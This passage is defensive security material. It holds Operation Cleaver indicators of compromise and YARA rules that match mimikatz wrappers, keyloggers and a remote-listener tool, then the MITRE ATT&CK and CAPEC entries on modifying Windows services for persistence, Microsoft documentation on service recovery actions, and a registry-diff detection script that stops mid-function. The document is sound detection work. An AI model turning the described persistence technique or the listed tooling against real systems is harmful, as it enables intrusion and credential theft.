microsoftwindowsupdate(dot)net
northropgrumman(dot)net
teledyne-jobs(dot)com
windowscentralupdate(dot)com
windowssecurityupdate(dot)com
windowsserverupdate(dot)com
windowsupdateserver(dot)com
www.gesunddurchsjahr(dot)de

Email Addresses Used for Domain Registration

davejsmith200(at)outlook.com
salman.ghazikhani(at)outlook.com
btr.8624(at)yahoo.com
ghanbarianco(at)gmail.com
azlinux73(at)gmail.com
domain(at)netafraz.com
tarh.andishan(at)yahoo.com
ahmadi(at)odeconline.com
kafe0(at)yahoo.com
dg_co(at)yahoo.com
zahiry_alireza(at)yahoo.com
zahiry.alireza(at)gmail.com

Email Addresses Used for Exfiltration

testmail_00001(at)yahoo.com
TerafficAnalyzer(at)yahoo.com
dyanachear(at)beyondsys.com

IP Addresses

50.23.164.161
64.120.128.154
64.120.208.74
64.120.208.75
64.120.208.76
64.120.208.78
64.120.208.154
66.96.252.198
78.109.194.114
80.243.182.149
87.98.167.71
87.98.167.85
87.98.167.141
88.150.214.162
88.150.214.166
88.150.214.168
88.150.214.170
95.211.191.225
95.211.191.247
95.211.241.249
95.211.241.251
108.175.152.230
108.175.153.158
159.253.144.209
173.192.144.68
174.36.195.158
184.82.158.18
184.82.181.48
188.227.180.213
192.111.145.197
203.150.224.249
207.182.142.68
212.87.154.12
212.87.154.14

Mutexes

ZSC1
Adobe Report Service
Bmgr

Dynamic Mutexes

These mutexes are used with the process ID of the malware as a suffix:

demdaramdidam
ILoveThisMutex

Installed Service Names

COM+ System Extentions
COM__System_Extentions
Network Connectivity Manager
Service1
MsNetMonitor
Pcapins
scManagerSvc
CredentialSync
Adobe Report Service

Samples (MD5)

Listed below are both the MD5 and SHA-256 hashes for samples related to Operation Cleaver.

01606d42c64e4d15ea07d4e1fbd0c40d
0405adfc8739025ba88c746c8edebfb8
04fdf5b757764af8bc7ef88e0f8fe8c1
0512c5a8807e4fdeb662e61d81cd1645
0593352cadb2789c19c2660e02b2648b
08eabb6164b1b12307931e4f2d95f7c6
0900c3319e4c46ff9478e3e1fa9528a1
0acd8945bd162e5e7aa982cddbd8ecaa
0ad6a01a916f14fc24fa43e46813b3bb
0b2cbfa07fa9a090b35a3dfdb0ebad9d
0b80a8d2c56789b4bda9a56a53e7e2b1
0f4b526d8edf1d3d32c81a692c325733
10d019932fc43e9b39be709f8281203d
1223e93dd4a5ad0536c8232936cb35fe
144064951cceaf1bb81e8f215de76101
14a80287490f3a68d99c0f518b246fd2
17d1f25185b31044eb89a99d50d36a26
18942a44d2b5f2bbf54e2c18ac293915
18efd3f66d23c5c555e128a19de63667
19d9b37d3acf3468887a4d41bf70e9aa
1c2bc564805695dbb3a26d9c9f7dffea
1c7e40443e36c4b7592617f0a271835d
1d8fd8c357907a79f3e6d9f831f2bd7d
21829130d5e2a69b0f6963c68b070127
2e36a3f3b888c1fd3c3aa3f1ba7969ad
30120cf30ea4d870635893cd75338f97
304f7f17031af90012d4e4d1cc5cfb8a
336b501bd96e309f93c8d12960634248
38998ff6f9a3874b6943d7ac837d19c3
3b6260ead85b4f0d706203e062a34a21
41eeae4158152f49ab64601c4358a7a1
42714874f86fa9bd97e9be460d7d72c0
42e459d1d057bd937e0d00958e591f08
48dd515e2b148493cf47b0c0c5713573
491f031d0a9ad4919cb29cb2d9a9a65c
4e483762f555b078976a1ddf3fc3e532
53230e7d5739091a6eb51298a50eb616
537b42d3cd9812e5b583131b83a48508
53841511791e4cac6f0768a9eb5def8a
54def27d598b75f297a8cf2c97150997
5837ad676f6c0f0f4f48096648d6e81b
5a4046fd0825641766b197a2132d2410
5e5d6469b270aa60dc90ddfde32ba082
5eef1ee37714c9ee07653419890010d6
6061410c04b9fa9e47593611a02ff2dd
6094f64d54575a2d5a3fbd2d23c4f44e
61896424e995476b23f73a5c1c34af5e
61e307a651a7bbce78eb48c1d395501a
636c2d2855ac8a8693c4ef9e89c67205
641fc6831d8c215e9645cf5d4a8be5e5
68cfc418c72b58b770bdccf19805703e
69d80a27ab0c85ef073badbee7ec55c7
69f9705ecdcc709506f7665ad373c1a0
6cd5f1982693f2ce21effddf18f5baf5
6d4d21258eef96979ce6f2417c6c019f
6ef950941d114c09af359402620d7cba
735cdf3a3e9c06d88de31112782ef831
736aab6c731d098931d6a4bf11a8150e
758f2557922e360bff3d1565e6871ea1
765f3db4421bdf8bb953dffe37398453
78a63bc8433cea162e31a5865d5817c9
836ef6b06c5fd52ecc910a3e3408004a
84384d77ac9835720375943235d33a87
855239a2434a3bc78751d9ba9cfac900
8994e16b14cde144a9cebdff685d8676
9376e5b754ccd94f7c66b811d81e240e
948c570269059928517f155b4b6db1a4
94ef4f98b9c321f74778811f64c68d03
96e372dea573714d34e394550059b1d7
9838f7ead2023061eb79587243910daa
985e86ac1854585d2771fd173b63b98b
9a48bee62c41c0640e9564cc37f718bf
9bcb8091ba414a38bfb7a39eccf3f6bc
9e00a52caec6385e0ab1e21e9794a5b0
9ef9ec11c9f83dde38556feaf88b2a29
9feee6fe54ee4ec859f7bad0d798ac4e
ad94daecadbac8a54e81a69cacc41441
ad99db10c0c12eaea09b39568a761b52
adf77661a409b5a1304d08b62a1264f5
af58d803b2e0b5d0f194c25ff85a8d81
afdfafb2c1e2af1a48e833da8f35bb83
b163fcda16d8fe860a906f768ef27bc8
b2d78ecce135e008adc3e80915f69798
b3d5e1ff7a7ff10cd738b215f92d1ad5
b7ddb09bdc0d0eb39c364d9b9d6436cc
baa76a571329cdc4d7e98c398d80450c
bd9fbbbd7dab62ed6a56d00f21c4c67e
be6273ebd472a2a499a6c1e48ae81112
be741520f13a2bf8bc064a73e146bf08
bfc59f1f442686af73704eff6c0226f0
c1b5464c0506bea6cf778dd18fa456cc
c440ec0a8cf7341b746160a684c51741
c5282f088b90de1ab758424b152d34ac
c91887d861d9bd4a5872249b641bc9f9
cb52f84d462ac67bde53eec40128408c
cbe05db979444589211e830487df7610
d000071a6bf49da390fef8f12aa9e3f8
d84c3d678f269a0c6beb22ed266efac0
de56ca66423fc5e42808445f2b5631d3
de744bcb7c63b035b6c5c3ec0279c3ac
e0f6c5fdde04fbf8cd1a42f75cb06248
e4c9e8f28894e89d6270ad6a4c6cd064
e4e5f1efe44ac06bc3672fd1d8f85630
e5428bcae8b4e84cb5186ad5c83ffc98
e7428dec7deb041692d6575e069c1cf0
e8b1f23616f9d8493e8a1bf0ca0f512a
e8ea10d5cde2e8661e9512fb684c4c98
eac61634da4513a10b596e6c8c299126
eb48c318e8fd9a2a7a18da6578db05d6
f1301bad6da06f436e3a3de0244848e1
f3d80d813dc6a239d921169c57c5789d
fa7c9a78eda0f3bb9ff8ec827d5bc9ff

Samples (SHA-256)

039ce41fb40a27a46c43bf7ef7d1b08cd5e3f6d71ec08e140cd9166247e783af
0510efd8eae869cd0773a033d5a46d6b7f0162174019e54618887f3085312fcb
064e47074342a6e026de068adaf48c41b2ec2c341c7514768cb7b39425905524
08065f658d65773e583e9ca784148117d87be3a5005a0871cbc4446f42ed5040
0ce968ea8cffb6312f6d17af9044a14f79d6427b9038bcfc6212acb5aa23e74b
0d1f479842cd5bde4f18ab8c85a099da39e13a4051a7c21334e33d55b6f18d76
0fee562cd821f53e864e02b00a59780aed63abca9f7502678fca9bf47b8b12bd
10647c4e7b1b741aeaea9b16d8eb5dae3237ce00dc69f6843790767a277b6204
10cf7a186897243363278cf0283a1687749d9ba43fa713b9f974050f56e97cca
15121b7cbd15143fc0118e06ebe70b7dc1e239b21d865b2c750ed8a0f1f00ef2
1578a4c641f0c7913cdf08267d1a88ac384d586c453b922670be380b7e67a179
1698d8168e860c3377646b12444d38a2e6aebba5a499504a5fc0a73b91d89407
1756ba79cd63458a50df86203380824ea855c8d6bf1c673e05a13a62f14cd170
1aa25a930e8bae5abbe75907c335c7d1d875b60f72f02855a8d37daadc6b469f
1efad3bce90ac1d2011ba686f1ab0e435b9a709763fb238dbcad0f44acddccbe
20dddd8651a26161139b49dfabfb3b4b743c57fcc982afc11d1c5c4264a2a8be
2a13730f8f16e04cece490eee53bbdcc9bd1e01fbbc2a758562a6462d9473742
2db6f74a8aef9fe86aef5dff3334e8dd252ac45e26b4a12e8641a770bbb08b45
2e32c6c9179750df7f1ab35536f09c6b09c73faccea7325fe5c79b5087f5dd6f
32aa8f19e452a1471640cd7be72f806e1997fd5a1a2b2743898ee4cd0aed0dc5
37af3f3b3c43690a2e73d4b5edb968896ec4da7b2c21b12a94e146a10f07fef8
39ba1710545fc9e123abbbce61bda1b00525e59346570a3f8c36f7adde5bb47e
3a7ebd7f502fd3f6b3b88693b1123147621b4030c21df9e0690864e8969e149a
3bdbf591fa0d81606929fdf6abe44ba6e185dd8fc0fa62ade8afde48f704d11a
3d18e18ae97045cc3198026ddc681e7d957a25402b79141a3c6fdc18bb879ad6
3fa302449da1e4fad81143cc48fc80034cbc41804f00e00ac17bdb7dba0b992d
42ca980b7fc7892716a923c7bf3ff6a76ce81f81bd0a83bea40a1735f33b36b8
45a2ea5226c1ce11e8955c99d5b58fd3baa66fb53436be63cb099e96ef30db43
48437fe7d7d0c5fbde340e1392662f7fc421fc05d7c9824f71160475105ad999
4f131095ba56f6d3621a007985ac758d780b0c837f554f6e44d535ed55d33af1
508c7691d535102538aaa6dce32d750c2492dada36506a390c1959f261a0244b
50d11ad32eb72b128185a0aecf39be8085b6b1a8f30cb41d8bc177a1ff8f3067
550a33353730579a7d2b9276cc3b66ca252a59e198285c732fcda46513351c03
5ac9f4e25ef4002274496e18ea537b4c582a3acf3126cc1830a63941d9c91e64
5d1e81f5a4fca25b7afb18eb906c9a53965d81dcf62f9d91499baf03229a8de8
5fb4ae33cac8b2b74e63fc639eeb969a660ef9a7e8310c2769acc925122f047e
616a25378f70474bcb3ad0fad2f1383009c5b7b3cea937be2a5234a110d64b78
634685e43e9f73343cb337ec64a8679485e1ddb4c2de5ecb6a5746aa5ddb1b72
6474f74340e7199919e7532c6756cf459cd20c3391852d80b058eb7997a31e9f
650f143ac0a668536b6750a628ec51e7ca28f5520105eeb87308f557cd74e63c
65509837e15b6a914b611c2d5066ba06ded39b0bed288552e65df20610e35976
67a2b9c32653161fafaea231b6661d9d797bb0964c79c9ee46cf2bf76571ed45
6888723e56f2e7696ac1e1910f68a1d54d7c76e9eb8e69554980b04e881e0e86
7199acca3d851889efa4a5a42b3f55010f4916294201ce5ad20c76898200ffa9
75b77606175ee696395f1b0e6850d5cd6596e34f74804b30c9bf9e368ebcd299
7890a726603edcd70b6e6f3de367cf891131d833d14c506b26e07935a715048f
79ca080a152bd44f9b07af0f940c303e45e10d516633384f5b3d34a29d0d03c8
7b9fd4b9b36cf84fcbcb3e9bf589d8a51c2166558baf462ab312929fbb584642
80ed4e7a242ee3d1c2656affb04cd56e7262e5a6bf2bec2f8435aa3f47c9b5d1
8129345ce66643d880a3e01e607399279dec7bf9cadc06d9b26134f6d205ed06
8813bd0b4ad6c6155b571c9c1fbcabfeed3812ab8fbd9acd8372385094aaa565
8f02dfd900760cb2c84e4f5a859512f5d719daae063a719c956cbf6185004da5
8f9a45ba73c67ba9c4958ea49508c350a0e1c3caf476ccab2fb8cb3049e3ba46
902f2391b1075e14985bc91316c98cdcf3442ecaeb3ef12422813f946ab8409e
9801f7c552cbcf8c413dade920b96be2eaad9624ba4adaf17f80f815dac58974
9aec3f14ec69e9942a7d3075bb5479dc5fa61e6c2a03cbee1a9269264efac51c
9ba06cb9dcd05e6866ee0e9ecc0c9a480d5b6c8d177ef1907d7fcc02e2871806
9ebbd300ddf70bccbecfe3bf47898e5959cfc090cef8716e2e638d840a24007b
a321158d7f5be572ac5536ad57cb4a312bea52430b03da9dda97f4548a080bc3
aa23c55bed562cbf47c84092d0a35b0da35e3db3982a18a28fb45ca70ac6b399
aa7ac2a053ceba819fcd1c8b273db64296c2754a8101291870e142519c416b1b
abb0ebd57cf2b0d54cd2b01fd9b11ccd9ed68053174d131922811a9ad22459ea
ac272bd9701c5d9cb7e8d1a4e2a191a894e98aa463fb17628c52da16612627d8
ad06e03fdd9eff480ca623ea23ec87c794d99ae6dda308c979fa5173b2b8a514
ad5fbf8e381d92225aa6c022e2bbc175be0e33138b5fa4bbb508b970b33bbc1e
ad71283aadb2455f7a1cd4e8283c789599c33d328da44965f6c282f2e600e1b2
aebac79b820891510b9e14ef97892875bf4197797ca91aef149acdc1e6bf6a7c
af8deedc78097c387926bb95ebd6ab2a870349794f452f35f84132b0dbe12e09
b18f80a02d45eaed618993447c82916ad8802e552dddccf733a3698794d8cb9d
b275caf4cbc4f47b3d772886172438b81a2e11ff5a8683be488de4b219b39070
b42ef5f39aaf6e52ff4e0510b6e5c3fb5c84bf35befcde8bcc18dc86bccbdfb4
b49706b7d5432a368070ee58aa8776cce1ddc2098e863b1b7b36d7b7d79fe6a9
b4d4c421bc70e5a3345d4b8c9d1090ff16ff82870bd38216bb8bac7f1088dafb
b99cddd428e78ede109c7bd3683c374ac6010a15c0633939511e39c1ed99f621
bb2b135c7a9b366ec7090404761a9ee9e7c03c56d68165a6789a29e804104068
be4cc2d1504002107a77bb943ad2d22c205cdcc6ad4804c0440970e5e922d30d
bf7746d29330b666d82b153989d41406305572b92f6b24a1f1adef6374b58328
bfa66edd0d9ae2c8179893ee881f479b37dce0ce8220a8a18e1b42a879ddff4a
c11a244cba9da30173ff1dcb755a377c3b2b1f99cd15a887041937b086113ebd
c1c1e5b43b1ac9af79aafa59a6062468142afc2278b6fea0bb4dbbb83af65d06
c30a2fe22050dcac30616a3d27d5c92ea2815d060b365747984913758a209aaa
c74df42cfc7c7221f7f28c67bd726a1caad8453fc35daddfb094aaeede2e8e1e
c9010e060de6a83c3802ed4e6b7f544e6eb2b5420ee2be5c71646e6a27182bea
c901d84878f50a93ab76f2ea31763bebb0acf0c0f9ad86b3abf98e5cde499332
c99fa90038cec60d9aa21a49e537ad9ea55672ed78cf5b429cb4c75ebc5ccd69
c9fc8133e755c14cb02872ba05a2332baefe5e94797479aded46c3db83a7cc14
ca7138bfe08b480386653072482e58f6c48b05a1e7fb8a82cc042806eae9acc2
caa769a21bf97987de4cc92874eaa03e7b0538082c502606aa8ca97823e2e2aa
cd75664edea18e3aa303763e6f6c639b3e90ead4b51c2b3e41c808e3d968c848
cffba2a145d91bdecfa8cb32af6964576889faa04591b503a58507cf89ab7cae
d045ea925cf461da5c58cc2af8a0f96ec7c961ea62ffcf1de0b04abf9b0fa8ac
d11b504b18bc8615e98f3c37d98c6fe11216a0f070a056414ca4407fc298fbd6
d3c2488d321ca6760986fc1a55a3c1db3f7b215fc2883d7e4fabc2871b5a27ac
d4e54c1bc1efba20d75861c01bb2cc053b1ab9fadae29bf6c4c04528110056e6
d5d1fa5b5474089e59c05ca88a96257d4449d852b429c620aa773408bd48d067
d8c7aef47bac024188d929e749e90ac172fd51b8f6e16dec4b6635dc2ffa85ef
dc21a2189f9e2d63872c0b5ee7ec75316799c60eb018ba9b98398b69efe45365
dc22e4b5ef752d3ec47d7bb3de7534e4a2daa2642de8c9839ad262d33a7aa7dc
e180f933aad709883acde441ee64407d49fa4183ae5130480005a0e81a0de491
e250bce96e5f0c162dbe4d87a1a7d65deb910f59c0bea1140897c22eb9dca501
e2e9d60c76225db77668440ff698eacef48b544ffab1ae0c641dcedb5ad570bd
e339c7b77113f1a1c4c2f7e307b785cc4fc9145663fe3a612079240efcc9ac93
e3b38627d9e94a7e084e12cbd2acf7e66ce90021972061f8b9b61316eddb3bd6
e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53
e4d43cd20d4ea59f68c26d46c30e1819cac5b9552d27fce826b0855494018267
e509843b2c061fa5e6ea7d11554bb22f36e6b79b7cd5cc0639ff63d48ce66336
ed85c3f8d2cccbb6a0ec2b4b27b158b4dbc6885245081901dd51eb2266f4b2bf
ee33dd17802ca906fcc68815ff2a7d12ac7fab7f1c272a56444e4fd6715a6227
eea0dcabaabef075081e23fc91b84e07042117bb0362e59f11b17338108d0c1b
f7e1a74e08c5718de9edc57facc26dda97ae5b723420a06ef56f1f6f8aa6fb5a
fbc531e83359310e2940ffff180a26e28d55396710c748e2ae7e64357273a09d
fd4a9af7ba67f794a83a720539666e89f288686a432b5c7133033a2ebde266cc

Public/Private Key Fingerprints

0A:E1:AE:85:6A:BB:D5:87:BF:8E:21:4E:92:E6:1F:8C
70:70:2F:11:2B:01:03:4A:70:D9:5E:11:CC:E9:7A:16
6F:DB:BB:BA:DA:7F:FA:4B:3F:A1:C3:46:5E:4B:8F:31:E8:31:F1:EC
78:BE:02:06:B3:1E:57:DF:62:4E:30:16:ED:AA:5C:56:F7:E8:11:62

YARA Signatures

rule BackDoorLogger
{
    strings:
        $s1 = "BackDoorLogger"
        $s2 = "zhuAddress"
    condition:
        all of them
}

rule Jasus
{
    strings:
        $s1 = "pcap_dump_open"
        $s2 = "Resolving IPs to poison..."
        $s3 = "WARNNING: Gateway IP can not be found"
    condition:
        all of them
}

rule LoggerModule
{
    strings:
        $s1 = "%s-%02d%02d%02d%02d%02d.r"
        $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
    condition:
        all of them
}

rule NetC
{
    strings:
        $s1 = "NetC.exe" wide
        $s2 = "Net Service"
    condition:
        all of them
}

rule ShellCreator2
{
    strings:
        $s1 = "ShellCreator2.Properties"
        $s2 = "set_IV"
    condition:
        all of them
}

rule SmartCopy2
{
    strings:
        $s1 = "SmartCopy2.Properties"
        $s2 = "ZhuFrameWork"
    condition:
        all of them
}

rule SynFlooder
{
    strings:
        $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
        $s2 = "your target's IP is : %s"
        $s3 = "Raw TCP Socket Created successfully."
    condition:
        all of them
}

rule TinyZBot
{
    strings:
        $s1 = "NetScp" wide
        $s2 = "TinyZBot.Properties.Resources.resources"
        $s3 = "Aoao WaterMark"
        $s4 = "Run_a_exe"
        $s5 = "netscp.exe"
        $s6 = "get_MainModule_WebReference_DefaultWS"
        $s7 = "remove_CheckFileMD5Completed"
        $s8 = "http://tempuri.org/"
        $s9 = "Zhoupin_Cleaver"
    condition:
        ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9
}

rule ZhoupinExploitCrew
{
    strings:
        $s1 = "zhoupin exploit crew" nocase
        $s2 = "zhopin exploit crew" nocase
    condition:
        1 of them
}

rule antivirusdetector
{
    strings:
        $s1 = "getShadyProcess"
        $s2 = "getSystemAntiviruses"
        $s3 = "AntiVirusDetector"
    condition:
        all of them
}

rule csext
{
    strings:
        $s1 = "COM+ System Extentions"
        $s2 = "csext.exe"
        $s3 = "COM_Extentions_bin"
    condition:
        all of them
}

rule kagent
{
    strings:
        $s1 = "kill command is in last machine, going back"
        $s2 = "message data length in B64: %d Bytes"
    condition:
        all of them
}

rule mimikatzWrapper
{
    strings:
        $s1 = "mimikatzWrapper"
        $s2 = "get_mimikatz"
    condition:
        all of them
}

rule pvz_in
{
    strings:
        $s1 = "LAST_TIME=00/00/0000:00:00PM$"
        $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
    condition:
        all of them
}

rule pvz_out
{
    strings:
        $s1 = "Network Connectivity Module" wide
        $s2 = "OSPPSVC" wide
    condition:
        all of them
}

rule wndTest
{
    strings:
        $s1 = "[Alt]" wide
        $s2 = "<< %s >>:" wide
        $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
    condition:
        all of them
}

rule zhCat
{
    strings:
        $s1 = "zhCat -l -h -tp 1234"
        $s2 = "ABC ( A Big Company )" wide
    condition:
        all of them
}

rule zhLookUp
{
    strings:
        $s1 = "zhLookUp.Properties"
    condition:
        all of them
}

rule zhmimikatz
{
    strings:
        $s1 = "MimikatzRunner"
        $s2 = "zhmimikatz"
    condition:
        all of them
}
Modify Existing Service

Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.

Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. [1] [2]

ID: T1031
Tactic: Persistence
Platform: Windows
Permissions Required: Administrator, SYSTEM
Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters
CAPEC ID: CAPEC-551
Contributors: Travis Smith, Tripwire; Matthew Demaske, Adaptforward
Version: 1.0

Mitigations

Audit: Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them.
User Account Management: Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.

Examples

APT19: An APT19 Port 22 malware variant registers itself as a service. [16]
APT32: APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. [14]
Bankshot: Bankshot can terminate a specific process by its process id. [6] [7]
BBSRAT: BBSRAT can modify service configurations. [11]
Empire: Empire can utilize built-in modules to modify service binaries and restore them to their original state. [5]
GreyEnergy: GreyEnergy chooses a service, drops a DLL file, and writes it to that service's ServiceDLL Registry key. [8]
Honeybee: Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL. [15]
PlugX: PlugX has a module to change service configurations as well as start, control, and delete services. [13]
PoisonIvy: PoisonIvy creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk. [10]
PowerSploit: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs. [3] [4]
TYPEFRAME: TYPEFRAME can delete services from the victim's machine. [12]
Volgmer: Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDll entry in the service's Registry entry. [9]

Detection

Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. A changed binary path, or a startup type that moves from manual or disabled to automatic when the service does not normally do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. [17] Service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services.

Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute cmd commands or scripts. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques.

Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.

References

1. The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.
2. Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018.
3. PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.
4. PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.
5. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
6. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
7. US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
8. Cherepanov, A. (2018, October). GREYENERGY: A successor to BlackEnergy. Retrieved November 15, 2018.
9. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA - North Korean Trojan: Volgmer. Retrieved December 7, 2017.
10. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
11. Lee, B., Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.
12. US-CERT. (2018, June 14). MAR-10135536-12 - North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
13. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
14. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
15. Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.
16. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
17. Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.

Copyright © 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.
CAPEC-551: Modify Existing Service (CAPEC Version 3.1)

Attack Pattern ID: 551
Abstraction: Detailed
Status: Draft

Description

When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.

Relationships

The table below shows the other attack patterns and high level categories that are related to this attack pattern. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and CanAlsoBe are defined to show similar attack patterns that the user may want to explore.

Nature: ChildOf | Type: Standard Attack Pattern | ID: 542 | Name: Targeted Malware

(A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.)

Mitigations

Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently.

Related Weaknesses

A Related Weakness relationship associates a weakness with this attack pattern. Each association implies a weakness that must exist for a given attack to be successful. If multiple weaknesses are associated with the attack pattern, then any of the weaknesses (but not necessarily all) may be present for the attack to be successful. Each related weakness is identified by a CWE identifier.

CWE-284: Improper Access Control
CWE-522: Insufficiently Protected Credentials

Taxonomy Mappings (ATT&CK)

T1031: Modify Existing Service

Content History

Submitted 2015-11-09 by the CAPEC Content Team, The MITRE Corporation.
Modified 2019-04-04 by the CAPEC Content Team, The MITRE Corporation: Updated Related_Weaknesses.

Page Last Updated or Reviewed: July 31, 2018

Use of the Common Attack Pattern Enumeration and Classification dictionary and classification taxonomy, and the associated references from this website, are subject to the Terms of Use. For more information, please email capec@mitre.org. CAPEC is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA). Copyright © 2007 - 2019, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation.
Set up Recovery Actions to Take Place When a Service Fails (Microsoft Docs, 02/22/2013)

Applies To: Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012

If a service fails, you can use the Services snap-in to specify what action to take (for example, running a program or script) on the first or second service failure, or on subsequent failures.

Membership in Account Operators, Domain Admins, Enterprise Admins, or equivalent, is the minimum required to complete this procedure. Review the details in "Additional considerations" in this topic.

To set up recovery actions to take place when a service fails

1. Click Start, in the Start Search box, type services.msc, and then press ENTER.
2. In the details pane, right-click the service for which you want to set up recovery actions, and then click Properties.
3. On the Recovery tab, click the action that you want in First failure, Second failure, and Subsequent failures, and then click OK.
   - If you click Run a Program, under Run program, type the full local path on the specified computer. Universal Naming Convention (UNC) names are not supported. For example, type C:\scripts\handlefailure.cmd, rather than \\computername\c$\scripts\handlefailure.cmd. Programs or scripts that you specify should not require user input.
   - If you click Restart the Computer, click Restart Computer Options to specify how long the computer waits before restarting. You can also create a message to send automatically to remote users before the computer restarts.
   - Select Enable actions for stops with errors in order to trigger the recovery actions when the service stops with an error, not only when it fails without stopping cleanly.

Additional considerations

To perform this procedure, you must be a member of the Account Operators group, the Domain Admins group, the Enterprise Admins group, or you must have been delegated the appropriate authority. As a security best practice, consider using Run as to perform this procedure.

Recovery actions are available only on computers running Windows 2000 or later.

Additional references: Services
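The detection guidance on the Modify Existing Service page above (changes to the binary path, the ServiceDll and the start type under HKLM\SYSTEM\CurrentControlSet\Services) and the recovery-action feature just described (a program that runs when a service fails or is killed, stored in the service's FailureCommand value) can be checked with a single baseline diff. The following is an added example, not code from MITRE or Microsoft: it compares two constructed snapshots of the Services key and reports the changes an analyst would want to see. The service names, paths and the assumption that the snapshots were exported with reg.exe or Get-ItemProperty are illustrative; the Registry value names are the documented ones.

```python
"""Diff two snapshots of HKLM\\SYSTEM\\CurrentControlSet\\Services and flag the
changes the Modify Existing Service detection guidance describes.

Added example for this page; not MITRE's or Microsoft's code. Both snapshots are
constructed by hand in the shape an exporter (reg.exe or Get-ItemProperty) would
give: {service name: {value name: data}}. The value names (ImagePath, Start,
Parameters\\ServiceDll, FailureCommand) are the real ones under the Services key.
"""
import re

# "Start" DWORD: 0 boot, 1 system, 2 automatic, 3 manual, 4 disabled.
AUTOSTART = {0, 1, 2}

# Script/proxy hosts that do not belong in a service binary path or recovery command.
PROXY_HOST_RE = re.compile(
    r"\b(cmd|powershell|pwsh|rundll32|regsvr32|mshta|wscript|cscript)\.exe\b", re.I)
# Directories ordinary users can write to; a service binary there is a red flag.
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp|Public)\\", re.I)


def path_risk(path):
    """Return why a binary path or command looks abusable, or '' if it looks normal."""
    if not path:
        return ""
    if PROXY_HOST_RE.search(path):
        return "script/proxy host in service path"
    if USER_WRITABLE_RE.search(path):
        return "binary in user-writable directory"
    return ""


def diff_services(baseline, current):
    """Return (service, value, old, new, reason) for suspicious changes to existing services.

    Services present only in `current` belong to the New Service technique and are
    returned by new_services() instead.
    """
    findings = []
    for svc, cur in current.items():
        base = baseline.get(svc)
        if base is None:
            continue
        for value in ("ImagePath", "ServiceDll", "FailureCommand"):
            old, new = base.get(value), cur.get(value)
            if old == new:
                continue
            if value == "FailureCommand":
                # "Run a program" recovery action: fires when the service crashes or is killed.
                reason = "recovery program set" if old is None else "recovery program changed"
            else:
                reason = path_risk(new) or f"{value} changed"
            findings.append((svc, value, old, new, reason))
        old_start, new_start = base.get("Start"), cur.get("Start")
        if old_start not in AUTOSTART and new_start in AUTOSTART:
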